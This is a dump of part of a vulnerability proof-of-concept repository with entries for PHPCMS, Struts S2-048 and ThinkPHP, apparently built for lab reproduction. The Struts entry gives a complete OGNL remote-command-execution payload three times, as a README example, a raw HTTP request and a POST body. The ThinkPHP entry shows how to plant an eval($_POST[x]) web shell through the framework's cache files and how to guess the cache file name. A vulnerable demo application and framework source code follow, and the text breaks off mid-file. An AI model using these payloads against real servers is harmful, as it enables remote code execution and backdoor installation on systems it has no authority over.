![poc.png](poc.png) 17 | 18 | ## References 19 | 20 | 1. http://www.lybbn.cn/data/datas.php?yw=176 21 | 2. https://www.seebug.org/vuldb/ssvid-93121 -------------------------------------------------------------------------------- /PHPCMS/PHPCMS_v9.6.2_任意文件下载/poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/PHPCMS/PHPCMS_v9.6.2_任意文件下载/poc.png -------------------------------------------------------------------------------- /Struts/S2-048(CVE-2017-9791)/README.md: -------------------------------------------------------------------------------- 1 | # S2-048(CVE-2017-9791) 2 | 3 | ## Affected Version 4 | 5 | Struts 2.3.x 6 | 7 | 此外需要满足下面的条件: 8 | 9 | 1. 调用非默认插件 struts2-struts1-plugin.jar 10 | 2. 代码中创建 ActionMessage 对象使用 字符串拼接的形式,如下: 11 | 12 | messages.add("msg", new ActionMessage("Gangster " + gform.getName() + " was added")); 13 | 14 | ## poc 15 | 16 | > 漏洞环境使用 Struts-2.3.32 版本 的 showcase 应用 17 | 18 | Py 脚本验证 (poc.py) 19 | 20 | ![](py-poc.png) 21 | 22 | Forefox Hackbar 验证: 23 | 24 | POST 数据包: 25 | 26 | age=1&cmd=echo Affected by S2-048&__checkbox_bustedBefore=true&name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%23parameters.cmd%5B0%5D%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D&description=test 27 | 28 | 结果: 29 | 30 | ![](firefox-poc.png) 31 | 32 | ## References 33 | 34 | 1. https://cwiki.apache.org/confluence/display/WW/S2-048 35 | 2. https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-048 36 | -------------------------------------------------------------------------------- /Struts/S2-048(CVE-2017-9791)/burp-poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/Struts/S2-048(CVE-2017-9791)/burp-poc.png -------------------------------------------------------------------------------- /Struts/S2-048(CVE-2017-9791)/burp-poc.txt: -------------------------------------------------------------------------------- 1 | POST /S2-048/integration/saveGangster.action HTTP/1.1 2 | Host: 127.0.0.1:8080 3 | Connection: close 4 | Accept: */* 5 | User-Agent: python-requests/2.13.0 6 | Referer: http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster 7 | Content-Length: 1200 8 | Content-Type: application/x-www-form-urlencoded 9 | 10 | age=1&cmd=echo Affected by S2-048&__checkbox_bustedBefore=true&name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%23parameters.cmd%5B0%5D%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew+java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D&description=test -------------------------------------------------------------------------------- /Struts/S2-048(CVE-2017-9791)/firefox-poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/Struts/S2-048(CVE-2017-9791)/firefox-poc.png -------------------------------------------------------------------------------- /Struts/S2-048(CVE-2017-9791)/firefox-post.txt: -------------------------------------------------------------------------------- 1 | age=1&cmd=echo Affected by S2-048&__checkbox_bustedBefore=true&name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%23parameters.cmd%5B0%5D%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D&description=test -------------------------------------------------------------------------------- /Struts/S2-048(CVE-2017-9791)/py-poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/Struts/S2-048(CVE-2017-9791)/py-poc.png -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/README.md: -------------------------------------------------------------------------------- 1 | # ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷 2 | 3 | ## Affected Version 4 | 5 | - ThinkPHP_3.2.3-5.0.10 6 | 7 | ## PoC 8 | 9 | 该漏洞复现起来比较复杂,虽然需要同时满足很多条件才可以导致GetShell,不过风险确实存在,对于黑客来说任何一点细微的风险都有可能是整个攻击链条中重要的一环。 10 | 11 | 根据先知论坛上dalao的讨论,触发代码执行漏洞至少需要同时满足以下条件: 12 | 13 | - 1. 开启缓存功能 14 | - 2. 缓存文件所在目录可以从浏览器直接访问 15 | - 3. 需要能够猜解出缓存的文件名(文件名生成有一定规律) 16 | - 4. 同时可以控制缓存文件里的内容(比如通过写入到数据库进而生成缓存文件) 17 | 18 | 个人在复现这个漏洞的时候发现 5.0.x 版本的 TP 并不能直接访问到缓存文件所在的目录,所以默认情况下不能触发该漏洞。在 3.2.x 版本是可以直接从浏览器访问到缓存文件的。 19 | 20 | 为了触发TP 3.2.3 Demo 的 GetShell 漏洞,先发起如下请求: 21 | 22 | `http://localhost/tp3.2.3/index.php/Home/Index/get?id=%0D%0Aeval($_POST[x]);//` 23 | 24 | 下一步需要对缓存的文件名进行猜解,文件名的生成规则是缓存的key的MD5,所以黑盒情况下可以先算一些关键词的MD5,然后批量HEAD请求,发现响应200则说明存在这个缓存文件,或者结合源代码泄露漏洞进行利用,在这里我们直接从源码文件看到生成的文件: 25 | 26 | ![poc1.png](poc1.png) 27 | 28 | 文件名 也正是 缓存 key (name) 的MD5 值: 29 | 30 | `md5(name,32) = b068931cc450442b63f5b3d276ea4297` 31 | 32 | 最后,可以看到 b068931cc450442b63f5b3d276ea4297.php 的 内容为之前写进去的一句话木马: 33 | 34 | ![poc2.png](poc2.png) 35 | 36 | 37 | ## References 38 | 39 | 1. https://xianzhi.aliyun.com/forum/topic/99(漏洞详情) 40 | 2. http://www.thinkphp.cn/topic/51162.html(修复方案) -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/poc1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/poc1.png -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/poc2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/poc2.png -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Options +FollowSymlinks 3 | RewriteEngine On 4 | 5 | RewriteCond %{REQUEST_FILENAME} !-d 6 | RewriteCond %{REQUEST_FILENAME} !-f 7 | RewriteRule ^(.*)$ index.php?$1 [QSA,PT,L] 8 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Common/Common/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Common/Conf/config.php: -------------------------------------------------------------------------------- 1 | '配置值' 4 | ); -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Common/Conf/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Common/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Home/Common/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Home/Conf/config.php: -------------------------------------------------------------------------------- 1 | '配置值' 4 | ); -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Home/Conf/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Home/Controller/IndexController.class.php: -------------------------------------------------------------------------------- 1 | show('

:)

欢迎使用 ThinkPHP


版本 V{$Think.version}
','utf-8'); 7 | } 8 | 9 | public function get(){ 10 | //http://localhost/tp3.2.3/index.php/Home/Index/get?id=1/ 11 | $value = I('GET.'); 12 | S('name',$value,3600); 13 | var_dump($value); 14 | } 15 | } -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Home/Controller/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Home/Model/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Home/View/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Home/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/README.md: -------------------------------------------------------------------------------- 1 | 项目目录 -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Runtime/Cache/Home/20914c0f075f91df3579ffbdf5180b02.php: -------------------------------------------------------------------------------- 1 |

:)

欢迎使用 ThinkPHP


版本 V
-------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Runtime/Cache/Home/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Runtime/Cache/Home/p.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Runtime/Cache/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Runtime/Data/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Runtime/Logs/Common/18_01_13.log: -------------------------------------------------------------------------------- 1 | [ 2018-01-13T20:22:15+08:00 ] ::1 /tp3.2.3/Home/Index/index 2 | INFO: [ app_init ] --START-- 3 | INFO: Run Behavior\BuildLiteBehavior [ RunTime:0.000000s ] 4 | INFO: [ app_init ] --END-- [ RunTime:0.000000s ] 5 | ERR: 无法加载模块:Tp3.2.3 6 | 7 | [ 2018-01-13T20:22:20+08:00 ] ::1 /tp3.2.3/Home/ 8 | INFO: [ app_init ] --START-- 9 | INFO: Run Behavior\BuildLiteBehavior [ RunTime:0.000000s ] 10 | INFO: [ app_init ] --END-- [ RunTime:0.000000s ] 11 | ERR: 无法加载模块:Tp3.2.3 12 | 13 | [ 2018-01-13T20:22:37+08:00 ] ::1 /tp3.2.3/Home 14 | INFO: [ app_init ] --START-- 15 | INFO: Run Behavior\BuildLiteBehavior [ RunTime:0.000000s ] 16 | INFO: [ app_init ] --END-- [ RunTime:0.000000s ] 17 | ERR: 无法加载模块:Tp3.2.3 18 | 19 | [ 2018-01-13T20:23:58+08:00 ] ::1 /tp3.2.3/Home 20 | INFO: [ app_init ] --START-- 21 | INFO: Run Behavior\BuildLiteBehavior [ RunTime:0.000000s ] 22 | INFO: [ app_init ] --END-- [ RunTime:0.000000s ] 23 | ERR: 无法加载模块:Tp3.2.3 24 | 25 | [ 2018-01-13T20:28:50+08:00 ] ::1 /tp3.2.3/Runtime/ 26 | INFO: [ app_init ] --START-- 27 | INFO: Run Behavior\BuildLiteBehavior [ RunTime:0.000000s ] 28 | INFO: [ app_init ] --END-- [ RunTime:0.000000s ] 29 | ERR: 无法加载模块:Tp3.2.3 30 | 31 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Runtime/Logs/Home/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Runtime/Logs/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Runtime/Temp/b068931cc450442b63f5b3d276ea4297.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Runtime/Temp/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/Runtime/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Application/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/Public/README.md: -------------------------------------------------------------------------------- 1 | 资源文件目录 -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/README.md: -------------------------------------------------------------------------------- 1 | ## 简介 2 | 3 | ThinkPHP 是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架 ,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领先和最具影响力的WEB应用开发框架,众多的典型案例确保可以稳定用于商业以及门户级的开发。 4 | 5 | ## 全面的WEB开发特性支持 6 | 7 | 最新的ThinkPHP为WEB应用开发提供了强有力的支持,这些支持包括: 8 | 9 | * MVC支持-基于多层模型(M)、视图(V)、控制器(C)的设计模式 10 | * ORM支持-提供了全功能和高性能的ORM支持,支持大部分数据库 11 | * 模板引擎支持-内置了高性能的基于标签库和XML标签的编译型模板引擎 12 | * RESTFul支持-通过REST控制器扩展提供了RESTFul支持,为你打造全新的URL设计和访问体验 13 | * 云平台支持-提供了对新浪SAE平台和百度BAE平台的强力支持,具备“横跨性”和“平滑性”,支持本地化开发和调试以及部署切换,让你轻松过渡,打造全新的开发体验。 14 | * CLI支持-支持基于命令行的应用开发 15 | * RPC支持-提供包括PHPRpc、HProse、jsonRPC和Yar在内远程调用解决方案 16 | * MongoDb支持-提供NoSQL的支持 17 | * 缓存支持-提供了包括文件、数据库、Memcache、Xcache、Redis等多种类型的缓存支持 18 | 19 | ## 大道至简的开发理念 20 | 21 | ThinkPHP从诞生以来一直秉承大道至简的开发理念,无论从底层实现还是应用开发,我们都倡导用最少的代码完成相同的功能,正是由于对简单的执着和代码的修炼,让我们长期保持出色的性能和极速的开发体验。在主流PHP开发框架的评测数据中表现卓越,简单和快速开发是我们不变的宗旨。 22 | 23 | ## 安全性 24 | 25 | 框架在系统层面提供了众多的安全特性,确保你的网站和产品安全无忧。这些特性包括: 26 | 27 | * XSS安全防护 28 | * 表单自动验证 29 | * 强制数据类型转换 30 | * 输入数据过滤 31 | * 表单令牌验证 32 | * 防SQL注入 33 | * 图像上传检测 34 | 35 | ## 商业友好的开源协议 36 | 37 | ThinkPHP遵循Apache2开源协议发布。Apache Licence是著名的非盈利开源组织Apache采用的协议。该协议和BSD类似,鼓励代码共享和尊重原作者的著作权,同样允许代码修改,再作为开源或商业软件发布。 -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Conf/debug.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | /** 13 | * ThinkPHP 默认的调试模式配置文件 14 | */ 15 | defined('THINK_PATH') or exit(); 16 | // 调试模式下面默认设置 可以在应用配置目录下重新定义 debug.php 覆盖 17 | return array( 18 | 'LOG_RECORD' => true, // 进行日志记录 19 | 'LOG_EXCEPTION_RECORD' => true, // 是否记录异常信息日志 20 | 'LOG_LEVEL' => 'EMERG,ALERT,CRIT,ERR,WARN,NOTIC,INFO,DEBUG,SQL', // 允许记录的日志级别 21 | 'DB_FIELDS_CACHE' => false, // 字段缓存信息 22 | 'DB_DEBUG' => true, // 开启调试模式 记录SQL日志 23 | 'TMPL_CACHE_ON' => false, // 是否开启模板编译缓存,设为false则每次都会重新编译 24 | 'TMPL_STRIP_SPACE' => false, // 是否去除模板文件里面的html空格与换行 25 | 'SHOW_ERROR_MSG' => true, // 显示错误信息 26 | 'URL_CASE_INSENSITIVE' => false, // URL区分大小写 27 | ); -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/LICENSE.txt: -------------------------------------------------------------------------------- 1 | 2 | ThinkPHP遵循Apache2开源协议发布,并提供免费使用。 3 | 版权所有Copyright © 2006-2014 by ThinkPHP (http://thinkphp.cn) 4 | All rights reserved。 5 | ThinkPHP® 商标和著作权所有者为上海顶想信息科技有限公司。 6 | 7 | Apache Licence是著名的非盈利开源组织Apache采用的协议。 8 | 该协议和BSD类似,鼓励代码共享和尊重原作者的著作权, 9 | 允许代码修改,再作为开源或商业软件发布。需要满足 10 | 的条件: 11 | 1. 需要给代码的用户一份Apache Licence ; 12 | 2. 如果你修改了代码,需要在被修改的文件中说明; 13 | 3. 在延伸的代码中(修改和有源代码衍生的代码中)需要 14 | 带有原来代码中的协议,商标,专利声明和其他原来作者规 15 | 定需要包含的说明; 16 | 4. 如果再发布的产品中包含一个Notice文件,则在Notice文 17 | 件中需要带有本协议内容。你可以在Notice中增加自己的 18 | 许可,但不可以表现为对Apache Licence构成更改。 19 | 具体的协议参考:http://www.apache.org/licenses/LICENSE-2.0 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 22 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 23 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS 24 | FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE 25 | COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, 26 | INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, 27 | BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 28 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 29 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 30 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN 31 | ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 32 | POSSIBILITY OF SUCH DAMAGE. 33 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Behavior/AgentCheckBehavior.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Behavior; 12 | /** 13 | * 行为扩展:代理检测 14 | */ 15 | class AgentCheckBehavior { 16 | public function run(&$params) { 17 | // 代理访问检测 18 | $limitProxyVisit = C('LIMIT_PROXY_VISIT',null,true); 19 | if($limitProxyVisit && ($_SERVER['HTTP_X_FORWARDED_FOR'] || $_SERVER['HTTP_VIA'] || $_SERVER['HTTP_PROXY_CONNECTION'] || $_SERVER['HTTP_USER_AGENT_VIA'])) { 20 | // 禁止代理访问 21 | exit('Access Denied'); 22 | } 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Behavior/BrowserCheckBehavior.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Behavior; 12 | /** 13 | * 浏览器防刷新检测 14 | */ 15 | class BrowserCheckBehavior { 16 | public function run(&$params) { 17 | if($_SERVER['REQUEST_METHOD'] == 'GET') { 18 | // 启用页面防刷新机制 19 | $guid = md5($_SERVER['PHP_SELF']); 20 | // 浏览器防刷新的时间间隔(秒) 默认为10 21 | $refleshTime = C('LIMIT_REFLESH_TIMES',null,10); 22 | // 检查页面刷新间隔 23 | if(cookie('_last_visit_time_'.$guid) && cookie('_last_visit_time_'.$guid)>time()-$refleshTime) { 24 | // 页面刷新读取浏览器缓存 25 | header('HTTP/1.1 304 Not Modified'); 26 | exit; 27 | }else{ 28 | // 缓存当前地址访问时间 29 | cookie('_last_visit_time_'.$guid, $_SERVER['REQUEST_TIME']); 30 | //header('Last-Modified:'.(date('D,d M Y H:i:s',$_SERVER['REQUEST_TIME']-C('LIMIT_REFLESH_TIMES'))).' GMT'); 31 | } 32 | } 33 | } 34 | } -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Behavior/ContentReplaceBehavior.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Behavior; 12 | /** 13 | * 系统行为扩展:模板内容输出替换 14 | */ 15 | class ContentReplaceBehavior { 16 | 17 | // 行为扩展的执行入口必须是run 18 | public function run(&$content){ 19 | $content = $this->templateContentReplace($content); 20 | } 21 | 22 | /** 23 | * 模板内容替换 24 | * @access protected 25 | * @param string $content 模板内容 26 | * @return string 27 | */ 28 | protected function templateContentReplace($content) { 29 | // 系统默认的特殊变量替换 30 | $replace = array( 31 | '__ROOT__' => __ROOT__, // 当前网站地址 32 | '__APP__' => __APP__, // 当前应用地址 33 | '__MODULE__' => __MODULE__, 34 | '__ACTION__' => __ACTION__, // 当前操作地址 35 | '__SELF__' => htmlentities(__SELF__), // 当前页面地址 36 | '__CONTROLLER__'=> __CONTROLLER__, 37 | '__URL__' => __CONTROLLER__, 38 | '__PUBLIC__' => __ROOT__.'/Public',// 站点公共目录 39 | ); 40 | // 允许用户自定义模板的字符串替换 41 | if(is_array(C('TMPL_PARSE_STRING')) ) 42 | $replace = array_merge($replace,C('TMPL_PARSE_STRING')); 43 | $content = str_replace(array_keys($replace),array_values($replace),$content); 44 | return $content; 45 | } 46 | 47 | } -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Behavior/RobotCheckBehavior.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Behavior; 12 | /** 13 | * 机器人检测 14 | * @author liu21st 15 | */ 16 | class RobotCheckBehavior { 17 | 18 | public function run(&$params) { 19 | // 机器人访问检测 20 | if(C('LIMIT_ROBOT_VISIT',null,true) && self::isRobot()) { 21 | // 禁止机器人访问 22 | exit('Access Denied'); 23 | } 24 | } 25 | 26 | static private function isRobot() { 27 | static $_robot = null; 28 | if(is_null($_robot)) { 29 | $spiders = 'Bot|Crawl|Spider|slurp|sohu-search|lycos|robozilla'; 30 | $browsers = 'MSIE|Netscape|Opera|Konqueror|Mozilla'; 31 | if(preg_match("/($browsers)/", $_SERVER['HTTP_USER_AGENT'])) { 32 | $_robot = false ; 33 | } elseif(preg_match("/($spiders)/", $_SERVER['HTTP_USER_AGENT'])) { 34 | $_robot = true; 35 | } else { 36 | $_robot = false; 37 | } 38 | } 39 | return $_robot; 40 | } 41 | } -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Behavior/WriteHtmlCacheBehavior.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Behavior; 12 | use Think\Storage; 13 | /** 14 | * 系统行为扩展:静态缓存写入 15 | */ 16 | class WriteHtmlCacheBehavior { 17 | 18 | // 行为扩展的执行入口必须是run 19 | public function run(&$content) { 20 | //2014-11-28 修改 如果有HTTP 4xx 3xx 5xx 头部,禁止存储 21 | //2014-12-1 修改 对注入的网址 防止生成,例如 /game/lst/SortType/hot/-e8-90-8c-e5-85-94-e7-88-b1-e6-b6-88-e9-99-a4/-e8-bf-9b-e5-87-bb-e7-9a-84-e9-83-a8-e8-90-bd/-e9-a3-8e-e4-ba-91-e5-a4-a9-e4-b8-8b/index.shtml 22 | if (C('HTML_CACHE_ON') && defined('HTML_FILE_NAME') 23 | && !preg_match('/Status.*[345]{1}\d{2}/i', implode(' ', headers_list())) 24 | && !preg_match('/(-[a-z0-9]{2}){3,}/i',HTML_FILE_NAME)) { 25 | //静态文件写入 26 | Storage::put(HTML_FILE_NAME, $content, 'html'); 27 | } 28 | } 29 | } -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Org/Util/Stack.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Org\Util; 12 | 13 | /** 14 | * Stack实现类 15 | * @category ORG 16 | * 